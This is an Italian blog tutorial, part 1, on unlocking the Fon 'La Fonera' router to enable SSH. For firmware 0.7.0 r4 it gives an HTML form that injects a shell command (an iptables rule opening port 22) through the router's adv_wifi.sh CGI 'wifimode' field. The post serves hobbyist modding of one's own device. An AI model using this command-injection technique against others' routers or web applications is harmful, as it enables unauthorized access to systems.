Hacking de “La Fonera” parte 1

Come promesso ecco che partiamo subito con le modifiche possibili al router wireless di Fon.
Si trovano numerosi articoli che spiegano in dettaglio come avviare il server ssh del router Fon e iniziare a fare le modifiche che ci interessano.

In questa prima parte, vi riassumo in breve quello che va fatto a seconda della versione del firmware. I metodi descritti iniettano codice html attraverso l’interfaccia web.


Prima di iniziare
Usate come ip per la vostra scheda ethernet 169.254.255.2 netmask 255.255.255.0 e collegate il cavo ethernet alla porta de La Fonera.
Questo perché La Fonera, usa 169.254.255.1 come ip dedicato al management, nel caso in cui non sia immediatamente disponibile una connessione internet sulla stessa porta.

Adesso a seconda del firmware:

Firmware 0.7.0 r4

create un primo file chiamandolo step1.html con questo contenuto:

<html>
<head>
</head>
<body>
<center>
<form method=”post” action=”http://169.254.255.1/cgi-bin/webif/adv_wifi.sh” enctype=”multipart/form-data”>
<input name=”wifimode” value=”/usr/sbin/iptables -I INPUT 1 -p tcp –dport 22 -j ACCEPT” size=”68″ >
<input type=”submit” name=”submit” value=”Submit” onClick=”{this.form.wifimode.value=’&quot;;’ + this.form.wifimode.value +’;&quot;’}” />
</form>
</body>
</html>